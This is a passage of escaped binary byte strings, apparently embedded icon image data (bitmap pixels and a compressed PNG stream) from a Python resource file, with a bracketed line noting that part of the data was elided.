-\xff\x8d\xd3\x3c\xff\x8d\xd0\x3a\xfc\x8d\xc0\x30\x71\x8d\xff\x79\ -\x00\x8d\xa4\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x8d\xb3\x28\x00\x8d\xae\x25\x13\x8d\xc8\x35\ -\xc0\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\xff\x88\xdd\x52\ -\xff\x7b\xf9\x93\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa1\xff\x7a\xfb\x98\xff\x86\xe1\x5b\xff\x8d\xd3\x3b\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xca\x36\xd5\x8d\xb3\x29\ -\x22\x8d\xb7\x2b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\xa5\x20\x00\x8d\xcf\x39\x00\x8d\xbe\x2f\x5d\x8d\xcf\x3a\ -\xf9\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\xff\x8b\xd7\x46\xff\x7d\xf4\x87\ -\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ 
-\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa1\xff\x7b\xf8\x90\xff\x89\xdb\x4d\ -\xff\x8d\xd3\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd1\x3b\xfe\x8d\xc1\x31\ -\x79\x8d\xff\x6d\x00\x8d\xa5\x20\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\xaf\x26\x00\x8d\xa6\x21\x0b\x8d\xc7\x35\xb5\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3d\xff\x82\xea\x70\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xf6\x95\xff\x78\xfb\x9c\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa1\xff\x7f\xf0\x7d\ -\xff\x8c\xd5\x40\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xca\x36\ -\xcf\x8d\xb1\x28\x1a\x8d\xb4\x29\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\xbe\x2f\x00\x8d\xba\x2d\x3c\x8d\xce\x39\xee\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd2\x3b\xff\x88\xdd\x53\xff\x7a\xfb\x97\xff\x78\xff\xa1\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa2\xff\x7a\xdd\x78\xff\x79\xe6\x83\xff\x78\xff\xa2\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x79\xfd\x9c\ -\xff\x86\xe2\x5d\xff\x8d\xd2\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xcf\x3a\ -\xfa\x8d\xbe\x2f\x5b\x8d\xcb\x37\x00\x8d\xa3\x1f\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xa8\x22\ -\x00\x8d\xff\x5e\x00\x8d\xc3\x32\x81\x8d\xd1\x3b\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd4\x3e\xff\x80\xef\x7b\xff\x78\xff\xa1\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa2\xff\x7a\xd9\x73\xff\x7b\xc5\x5b\xff\x78\xff\xa1\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa1\ -\xff\x7e\xf3\x85\xff\x8c\xd6\x42\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd2\x3c\ -\xff\x8d\xc6\x34\xa5\x8d\x91\x14\x05\x8d\xad\x25\x00\x00\x00\x00\ 
-[elided: escaped binary data removed along with what appears to be an old icon (.ico) resource — the remaining pixel rows of a 256x256 32-bit RGBA bitmap, its 1-bit AND mask, and an embedded 256x256 RGBA PNG (signature \x89PNG, IHDR with bit depth 8 / color type 6, followed by a ~16 KB compressed IDAT stream)]
-\xe3\xba\x70\x0a\x50\x9b\xa2\xe6\x16\xf9\xa9\x4e\x0d\xca\x8a\xa1\ -\x1a\x04\x32\x2e\x3e\xe7\xe9\xdc\x54\x65\xe1\xbb\xbc\x32\xdf\x5f\ -\x9b\xc6\x53\x19\x0e\x60\x2c\x20\x05\x6c\xab\x84\x7c\xcd\xb6\x65\ -\x5e\xb4\xad\xce\xb6\xca\xa5\x82\xdf\xc5\x58\x68\x07\xc9\xbe\xf0\ -\xc5\x02\xc8\x8c\xbc\x01\xdd\xa3\x17\xcb\x8e\xe1\xf6\xc9\x16\xaf\ -\xbc\x69\x89\xe7\x4c\x35\x18\xf1\x74\xe6\x95\x80\x57\x86\xea\x24\ -\x9b\x95\xcb\x2f\x85\x3e\x2f\xc4\x0e\x8e\x12\xc8\xc8\xe3\xbf\x32\ -\xdd\xa4\x9f\xb5\x7c\x93\x5b\xe0\x2d\xb5\x49\x6a\x4e\x86\xbb\xfa\ -\x2c\x30\xea\x69\xbe\x6a\x73\x83\x97\xee\x5c\x62\x66\xd4\xc7\x91\ -\x57\xce\xb6\x5b\x03\x6d\x3f\x59\xa7\xb7\xe8\xd9\x0b\x42\x90\x2c\ -\xd0\xbd\x47\x35\x57\xf3\xac\xa9\x26\x2f\xdf\xb9\xc4\x81\xf1\x36\ -\x05\xd5\xfb\xdd\x8a\x5e\x52\xaa\x41\x75\x82\x5b\xa4\xe2\xe7\xac\ -\x65\xc7\xa0\x28\x81\xcc\x2b\x80\x55\x49\xbf\x67\x28\x87\x9f\xab\ -\x4e\xb2\xcd\xcb\xe8\x30\x0f\x4b\xbc\xa5\x37\x33\xea\xf3\x75\x3b\ -\x97\xb8\x63\xb2\x49\xc5\x31\xeb\x7a\x71\xb5\x01\x3f\x48\x6e\xad\ -\x82\x6c\x79\x00\x17\x63\x89\xb7\x3e\xa7\x4a\x11\x2f\xda\x5a\xe7\ -\xc5\xdb\x97\x99\x2e\x45\xd9\xcd\x0b\x08\x28\x8d\x41\x71\x84\x57\ -\x08\xc9\x7f\xe9\x0c\x9c\xcd\x3c\x19\x7d\xfc\x17\x62\x61\xab\x94\ -\xfc\x52\x79\x9c\x67\x17\x33\x5c\xe5\x37\x56\xd0\x3c\x6f\x4b\x83\ -\xaf\xd9\xb6\xcc\xe6\x52\xd4\x5d\xfb\x55\x11\x40\xa4\x13\x56\x00\ -\x02\x4a\x05\x9b\x5d\x81\xea\x60\x89\x9b\x96\xf6\x8c\xf8\xbc\x6c\ -\xd7\x12\x77\x4c\x35\x33\xeb\x0d\x48\x05\xb5\x49\x54\xa1\xc2\x77\ -\x02\xdf\x09\xc8\xac\x7b\x01\x99\x56\x00\x1d\xd7\xdf\x13\x82\xff\ -\x58\x1c\xe1\x1b\x2a\x13\xd9\x6b\xeb\xed\xc6\xfa\x37\x8d\xf8\xbc\ -\x74\xc7\x12\xb7\x4e\xb4\xf0\xae\xe3\x05\x8d\x22\x41\x10\x8a\xc4\ -\x04\x52\x88\xd8\x03\xc8\xd8\xed\xbc\x2c\x16\x18\x71\x35\x77\x4e\ -\x37\x78\xd1\xb6\x65\x26\x8b\x51\xda\x4b\x5a\x13\xe5\x42\x65\x13\ -\x55\xa7\xc0\x4f\x5a\xcb\x8b\xb2\x1e\x0a\x64\x56\x01\xcc\x1c\x9a\ -\xc5\xc6\x6f\xe7\xb7\xba\x45\x7e\xa8\xb2\x09\x27\x6b\x33\xfb\xbb\ -\x49\xab\xe7\x4c\x37\x78\xf1\xb6\x3a\x53\xa5\xeb\x7f\x29\xc3\x08\ -\x82\x30\xb9\xb5\x4b\x01\xc5\x0c\xe7\x51\xd6\xa2\xab\x6c\x67\x46\ -\x7d\x5e\xba\x73\x89\xdd\x23\x7e\x26\x77\x0a\x0a\x15\xa8\x8c\xb3\ -\x5b\x2a\xde\x62\x61\x57\xda\xeb\xb9\x12\x99\x54\x00\x2b\x1a\xd3\ -\x70\xbb\x72\xf9\xe9\xea\x24\x9b\xdc\x42\xda\xab\xba\x10\x0b\x4c\ -\x16\x23\x5e\xbc\x7d\x99\x67\x4e\x36\x29\xad\x33\xd6\x5f\x0b\x41\ -\x2c\xfc\x41\x82\x46\x4d\x4a\x28\x16\xb2\x26\x3a\xeb\xc3\x02\xe3\ -\x05\xcd\xd7\x6c\xab\xf3\xec\xa9\x06\xc5\x0c\x86\x04\xa5\x51\x28\ -\x8d\xf0\x0a\x21\xf8\x8f\xd6\xe2\x65\xd5\x0b\xc8\xa4\x02\x00\xb0\ -\x96\x31\x29\xf9\xe9\xf2\x18\x77\x64\xed\xd0\x0e\x29\x60\xcf\x88\ -\xcf\x4b\x76\x2c\x73\x53\x2d\xe8\x89\x15\x0a\x22\x41\x14\x25\xe7\ -\x90\x2b\x15\x87\x00\x83\x8a\x25\x2e\xa5\x7e\xd6\x54\x93\xe7\x6d\ -\xa9\x67\x6e\xbb\x50\x2a\xa8\x4c\x20\xdd\x22\xdf\x0b\x7c\x83\xcd\ -\x68\x28\x90\x39\x05\xd0\x69\xf2\x11\xc0\xeb\xbd\x0a\xaf\x2e\x8f\ -\x67\x27\xee\xef\x66\xf9\x6f\x9d\x68\xf1\x35\xdb\xea\x6c\x2a\x46\ -\x3d\x7b\xe9\x82\x10\xb4\x4e\xe6\xb3\x5a\x0b\x8e\x8a\xb7\x01\x07\ -\x99\x6e\x48\x70\x60\xbc\xcd\xd7\x6e\x5f\x66\xaa\xd4\xbb\xe7\xd1\ -\x0b\x9c\x02\x54\x26\x98\x54\x0e\x3f\x0e\xec\x85\xec\x29\x81\x4c\ -\x29\x80\x55\x37\xe7\x99\x8e\xc7\x8f\x56\x26\x28\x67\xa5\xd8\xc7\ -\x02\x45\x65\xb8\x73\xba\xc1\x9d\x9b\x1b\x37\xe4\xf2\xaf\x45\xdb\ -\x8f\xb7\x02\x93\xc2\x51\x36\xd5\x12\xe0\x5e\xd3\x2d\xb8\xda\x59\ -\x4d\x70\x2b\x65\x1d\x14\x6b\x50\x1c\xe1\x05\x42\xf0\x63\xd6\x92\ -\x39\x9f\x2b\x53\x0a\x00\xc0\x5a\x6a\x42\xf1\xa6\xd2\x28\x07\x0a\ -\x19\x39\xa5\xd7\x12\x97\xaa\x3e\x7f\x4b\x83\xdb\x37\xb5\xf0\x64\ 
-\xef\x63\xce\x56\x7b\x55\x17\x60\x02\xb8\x0e\x38\x4e\x7a\x09\xb4\ -\x5e\x3b\x3a\x96\xb8\x66\xe0\x6b\xb6\xd5\xd9\x33\xe2\x67\x66\x77\ -\x43\xc8\x95\x50\xe0\x75\xc0\x2b\xb3\x16\x0a\x64\x46\x01\xac\xba\ -\x29\xaf\xf2\xca\x7c\x6b\x56\x3a\xfc\x2c\x71\xf7\xde\xf3\xb7\xd4\ -\xd9\x37\xde\xee\x5b\xd6\xb9\xe5\xc7\xe5\xc0\x49\xe1\xb9\xf1\x57\ -\xd2\x48\x00\x0b\x8d\x76\xef\x3f\xaf\x05\x6a\x9e\xe6\xab\xb7\xd6\ -\x39\x30\xde\xce\x4c\x95\xa3\xe3\x41\x65\x82\xa9\x4e\x28\xb0\x23\ -\xed\xf5\xac\x26\x33\x0a\x00\xc0\x5a\x76\x29\x87\x1f\xac\x8c\x53\ -\xcd\xc2\x81\x9d\x16\xa8\xb9\x86\xaf\xde\x5a\x67\x66\xb4\x7f\x56\ -\xc5\x12\x17\x01\xd9\x84\x14\x80\x25\xde\x01\xf0\x9c\x64\x2e\x28\ -\x88\x5f\x34\x3f\x80\x47\x8f\x4b\x3e\xf8\x8f\x0e\x9f\xb8\x4f\xf5\ -\xe5\x7e\x76\xbd\xb5\xe7\x6e\xc9\x96\x12\x28\xd6\xa0\x50\xe5\x85\ -\x42\xf0\xbd\xd6\xe2\x64\xc5\x0b\xc8\x44\x14\xd8\x49\xfc\x29\x21\ -\xf9\xfe\x62\x8d\x17\x66\xe1\xdc\xbe\xd5\x2f\xd2\xee\x11\xbf\xef\ -\xd7\xf2\x03\xd1\xf3\xb1\x5f\x57\xc2\x73\xfb\xdb\x09\x28\x3a\x5f\ -\xda\xc2\xd9\x45\xc1\xc3\x8f\x4b\xbe\xf0\x88\xe4\xf8\x49\x49\xbd\ -\x09\x2f\x7b\xbe\xee\xdb\x67\x8d\xf3\x35\x96\xe7\x6e\xae\xa3\xa4\ -\xe5\xf0\x5c\x29\x51\xef\x6a\xcd\xfb\x11\x87\x02\x6e\xd8\xe6\x7b\ -\xc2\x16\x7f\x8b\xe0\x33\xe9\xae\x28\x26\x13\x0a\xa0\xc3\x33\x1d\ -\x8f\xef\x28\x8f\xa3\xd2\x6e\xf1\xed\x6e\x31\x3d\x7f\x4b\x6c\xf9\ -\xfb\x8d\x31\xd0\x6c\x5f\x30\x01\xac\xef\x14\xbc\xfe\xf4\x01\x74\ -\x05\xbf\xe9\xc3\x13\x4f\x4b\xbe\xf4\xa8\xe4\xa1\xc7\x24\x67\x17\ -\x04\x51\x67\x97\x43\x08\x18\xa9\x58\x24\xf4\x74\x16\xe1\x6a\x2c\ -\xf1\xac\x81\x67\x4f\x35\xd0\x46\xf0\xf0\x42\x31\x75\x25\xe0\x16\ -\xa1\x34\xc2\x6e\x1d\xf0\x46\x63\xf8\x91\x99\x43\xb3\xf5\xb4\x67\ -\x09\xa6\xae\x00\x3a\xd6\xbf\x28\x14\x3f\x50\x1c\x61\xaf\x9b\xd0\ -\x78\xaa\xcb\xd1\xb5\x1e\xcf\x99\x6e\xb2\xb7\xcf\x96\xbf\x8b\x36\ -\xd0\x4a\xb0\x13\x50\xd0\xdb\x4e\xc0\xae\xd0\x47\x06\xe6\x3a\xd6\ -\xfe\x8b\x8f\x48\x9e\x38\x29\x69\xb6\x3b\xdf\x23\xce\x2b\x1c\xcf\ -\x85\x6d\xd3\xfd\x97\xc6\xee\xb3\xfc\xaa\xcd\x0d\x2c\xf0\xf0\x7c\ -\x31\xf5\x6d\xc2\xd2\x28\xf8\x0d\xbe\xd1\x6f\xf0\x01\xe0\x7d\x33\ -\x87\x66\x53\x1d\x28\x9a\xaa\x02\x58\x89\x83\x04\x2f\x71\x8b\x7c\ -\x4b\x39\x03\x43\x3d\x1d\x61\x79\xe6\x54\x93\x83\xe3\xad\x44\xdc\ -\x71\x41\xec\x01\x24\xd9\x08\x04\x50\x2a\xde\xb8\x07\xd0\xbd\x3d\ -\xcd\x36\x1c\x3b\x19\x5b\xfb\x87\x8f\x4a\xe6\x16\x04\x91\xe9\x28\ -\x86\x8b\xee\xa1\xb1\xb0\x65\xd2\xb2\x73\x4b\x32\xd5\x7b\xdd\xed\ -\xdb\xe7\x4c\x37\xf0\xb5\xe0\xf1\xc5\x74\x77\xe2\x94\x0b\xe5\x31\ -\xc6\x23\x9f\x37\xea\x90\x4f\x0a\xc9\xd3\x69\xae\x27\x75\x0f\xc0\ -\x1a\xaa\xd2\xe1\xfb\xca\xa3\x4c\xa5\x7d\x72\xaf\x14\x70\x70\xa2\ -\xcd\x2d\x13\xad\x44\x93\x47\xc6\x80\x9f\x60\x1f\x80\x10\x50\x2a\ -\xda\x95\x13\x82\xae\xe9\xdf\x72\xde\xda\x9f\x59\x10\x3c\xf4\xb8\ -\xe4\xcb\x8f\x4a\x8e\x3f\x7d\x91\xb5\x17\x97\xff\xf7\x07\xf7\x18\ -\x6a\xe5\xe4\xca\x77\x2d\x50\x71\x0c\xcf\xdd\xdc\xa0\x1d\x49\x9e\ -\x6a\xb8\xa9\x6e\x30\x15\x6b\xd0\xae\xf3\xd5\xad\x45\xbe\x19\xc1\ -\xdb\xd3\xf4\x02\x52\x53\x00\xab\xac\xff\xcb\xdd\x22\x2f\x2f\x64\ -\xa0\x7b\x7a\xcf\x88\xcf\x73\xa6\x9b\x7d\xd9\xe7\xbf\x12\x91\x16\ -\x04\x41\x82\x21\x40\xa7\x11\xe8\x5a\x14\x80\xec\x7c\x6f\xbd\x25\ -\x38\x7a\x42\xf0\xe5\xaf\x48\x1e\x39\x2a\x99\x5f\xec\x58\x7b\x71\ -\xf5\x04\xa6\xb5\x50\x29\x59\x6e\xdd\x6b\xae\x4b\xf9\xdc\x08\xdd\ -\x21\x2d\xcf\xdb\x52\xe7\x9f\x9e\xac\x31\xef\x3b\xa9\x29\x01\x21\ -\xa1\x3c\x46\x31\x68\xf2\x7d\x3a\xe0\xc3\x42\x72\x2c\xa5\xa5\xa4\ -\xbb\x0d\x68\x0d\xe3\x4a\xf1\x03\xe5\x51\x26\xd2\xac\xf8\xb3\xc0\ -\xe6\x72\xc8\x73\xa6\x1b\x14\x55\x6f\x2b\xfc\xd6\x43\x10\xc6\x5f\ 
-\x49\xb6\x02\x17\xd6\xe1\x6d\x75\xb7\xef\xa2\x08\x8e\x9f\x12\x7c\ -\xf4\x5f\x15\xff\xeb\x7d\x0e\xef\xfa\xa0\xcb\xbf\xdc\xaf\x38\xb3\ -\x10\x9f\x05\x28\xd7\x79\xf4\x97\xb5\xb0\x6b\xab\x65\xdb\x74\xf2\ -\xf7\x18\xce\x17\x0b\x3d\x7b\xba\x49\x49\x25\x58\x75\xb5\x06\x5e\ -\x09\x8a\x55\xee\x10\x82\xbb\xad\x49\x6f\x6e\x40\x2a\x62\x77\x41\ -\xec\x5f\xe6\x45\x69\x5a\x7f\x0b\x8c\x78\xf1\x20\x8f\xb1\x42\x3a\ -\x0d\x25\x7e\xc2\x9d\x80\xea\x2a\x9d\x80\x5d\x61\x5e\x6a\x08\x8e\ -\x1c\x17\x7c\xf1\x11\xc5\x91\xe3\x82\xc5\xba\x40\xaf\xd3\xda\xaf\ -\x79\x5d\x05\xb7\xdd\x6c\x28\x79\xfd\xcb\xfe\xaf\x87\xdd\x23\x3e\ -\x4b\x81\xe2\xbe\xd3\x95\xd4\x76\x06\x84\x84\xd2\x28\x9e\xdf\xe0\ -\xf5\x91\xcf\xfb\x80\x23\x69\xac\x23\x35\x0f\xc0\x1a\x46\xa5\xe2\ -\xbb\x8b\x35\x46\xd3\xec\xf3\x2f\x28\xcb\xb3\xa6\x9a\x6c\x2e\x87\ -\xa9\x08\xbf\x00\xc2\x30\xb6\xb2\x49\xa1\xe4\xa5\xb3\x00\xba\xd6\ -\x5e\x6b\x78\xea\x8c\xe0\xa3\x9f\x8e\xad\xfd\xbb\xff\xc6\xe5\xde\ -\x07\x24\x0b\x4b\x71\x9d\xc2\x7a\xad\xfd\xc5\x58\x0b\x63\x35\xcb\ -\x81\xdd\xe9\x58\xff\x0b\x3e\xbf\x80\x5b\x26\x5a\x7d\xaf\xef\xb8\ -\x1a\x6e\x09\x0a\x15\x6e\x13\x92\x6f\x0d\x5b\x88\x34\xbc\x80\xc4\ -\x3d\x80\xd5\xd6\xdf\x2b\xf1\x75\xc5\x14\x5b\x7d\x05\x70\x70\xbc\ -\xcd\xbe\xb1\x74\x5f\x84\x20\x14\x44\x3a\x99\x23\x74\xad\x05\xa5\ -\xec\x4a\x27\x60\xf7\x92\xdd\xd8\xfe\x8b\x8f\x4a\x1e\x3d\x16\xc7\ -\xf6\xe6\x06\xac\xfd\x5a\xd7\x9d\xd9\x69\x98\x1c\x4b\xbf\x77\xbf\ -\xbb\x3d\xf8\xac\xa9\x26\x0b\x6d\x87\x79\xbf\x3f\x55\x89\x57\x43\ -\x08\x28\x8d\xe2\xf8\x0d\x5e\x63\x0d\x7f\x0e\x1c\x4f\x7a\x0d\xa9\ -\x78\x00\x46\x53\x92\x8a\x6f\x2f\x8e\x30\x26\x53\x8a\xfd\x2d\xb0\ -\xa5\x12\x72\xeb\xa6\x16\x4a\xa4\xfb\x4a\xb6\x83\x4e\x2b\x70\x42\ -\xd7\x73\x9c\x78\x16\x40\x64\x62\x6b\xff\xb1\xcf\x28\xfe\xe8\xfd\ -\x0e\xef\xfa\x90\xcb\xa7\x3e\xaf\x38\xbb\xd0\xfb\xaa\x44\xcf\x8d\ -\xdd\x7f\x37\x23\x53\x9d\x2c\x30\x51\x8c\x78\xd6\x74\xba\x03\x45\ -\xdc\x22\x78\x65\xee\x40\x70\x17\x22\xf9\x46\xa1\x44\xc5\xaf\xfb\ -\xe1\x84\xe0\xab\x9c\x02\x2f\x4d\xab\xe4\xb7\xdb\xe0\x73\xe7\x74\ -\x83\x9a\x9b\xfe\x20\x89\xb6\x9f\x6c\x27\xa0\x14\xf0\xe8\x31\xc9\ -\x3f\xde\x2b\x78\xf8\xa8\x64\xe1\x1a\x32\xf9\xd7\x83\xb5\x30\x35\ -\x61\x99\xd9\x91\xbe\xf5\xbf\x98\xdd\x23\x01\xa7\x1a\x6d\x0e\xcf\ -\x97\x52\xb9\xbe\x90\x50\xac\x51\xf0\xeb\xbc\x46\x87\xbc\x5f\x48\ -\xe6\x92\xbc\x7e\xe2\x1e\x80\xd1\xb8\x52\xf1\xba\x62\x8d\x2d\x69\ -\x35\xfc\x74\x87\x48\xa4\x15\xf7\xaf\xc6\x92\x6c\x27\xa0\x10\xb0\ -\x54\x17\x7c\xf0\xe3\x0e\xff\x72\x7f\x6c\xed\xaf\x25\x93\x7f\xbd\ -\x9f\xf1\xc0\x6e\xc3\x68\x2d\x7b\x0a\xc0\x11\x96\xdb\x27\x5b\xa9\ -\x0e\x13\xf1\xca\xe0\x95\xf8\x6a\x04\x5f\x0b\xc9\x7a\x01\x89\x2b\ -\x00\x21\xd8\xaf\x3c\xee\x2a\xa6\x94\xf9\xb7\xc0\xb6\x4a\xc0\xc1\ -\x84\x8b\x7d\xae\x44\xdb\x4f\xae\x13\x10\xe2\xd2\xe3\x20\xec\x9f\ -\xc5\x5f\x8d\x05\xca\x85\xd8\xfd\xcf\x54\xeb\xe9\xaa\xf5\x8d\x78\ -\x9a\xdb\x36\xb5\x28\xa8\x74\x54\x80\x54\x50\xa8\x31\x22\x15\xaf\ -\x32\x9a\x44\x8b\xe1\x13\x7b\x26\x33\x87\x66\x91\x0a\x84\xe0\xdf\ -\x14\x2a\xec\x4e\xeb\x64\x9f\x82\xb2\xdc\xba\xa9\xb5\xee\x03\x3b\ -\xfa\x8d\x25\x0e\x01\x92\x54\x00\x89\x7e\x3e\x03\xdb\x37\x1b\x76\ -\x6e\xce\xc6\xfd\xbe\x1c\xbb\x47\x7c\xf6\x8c\xf8\xa9\xad\xb1\x50\ -\x01\xc7\xe3\x65\x42\x70\x4b\x92\xd7\x4d\x54\x29\xeb\x90\x2d\xd2\ -\xe5\x9b\x0b\xd5\xf4\x8c\xc1\xde\x51\x9f\x1d\xd5\xf4\x5d\xff\x2e\ -\xd6\xc6\x21\x40\x56\xd6\xd3\x6b\xa4\x84\x5b\x67\x0c\xe5\x62\xb6\ -\x3f\xa3\xdb\x99\xf5\x98\x56\x2d\x88\x72\xa1\x50\x61\xbb\x90\x7c\ -\xfd\xd8\xd6\xe4\xc2\x80\x44\x04\x71\xd5\xd6\xdf\xd7\x78\x65\x9e\ -\xed\xa5\x90\x6f\xe9\x4e\x8b\xb9\x65\xbc\x85\x93\x72\xd6\x7f\x35\ 
-\x71\x23\x50\x06\x87\xdb\xf7\x00\x6b\xa1\x56\xb1\x1c\xdc\x63\xb2\ -\x30\xdc\xe9\xca\x6b\x05\x36\x95\x22\xf6\x8f\xa5\x37\x44\xa4\x50\ -\x45\x29\x87\x7f\x3b\x7f\x82\xc9\xa4\xae\x99\x98\x25\x36\x9a\x82\ -\x54\x7c\x63\xb1\x42\x25\x8d\x7e\x7f\x01\xdc\x3c\xe6\xb3\x29\x63\ -\x93\x63\xb5\x89\xb7\x01\x87\x11\x6b\x61\xcf\x76\xcb\xe6\x4d\x36\ -\xd5\xca\xbf\xf5\x12\xbf\x23\x6d\xb6\xa4\x94\x1c\x76\x0a\xe0\x16\ -\x79\xa6\x80\xe7\x41\x32\x5e\x40\x62\xa2\x28\x04\x7b\x1c\x8f\x17\ -\xa5\x71\xb0\x67\x7c\x90\x44\xc4\xcc\x68\x3b\x53\x96\xa8\x7b\x26\ -\x60\xdb\x27\x13\xf3\x0f\x7b\x8d\xe3\xc4\xc9\xbf\x42\xea\x3d\xa7\ -\xeb\xa3\xbb\x3d\x7c\x70\xbc\x85\x2b\x93\x57\x01\x52\x81\x57\x65\ 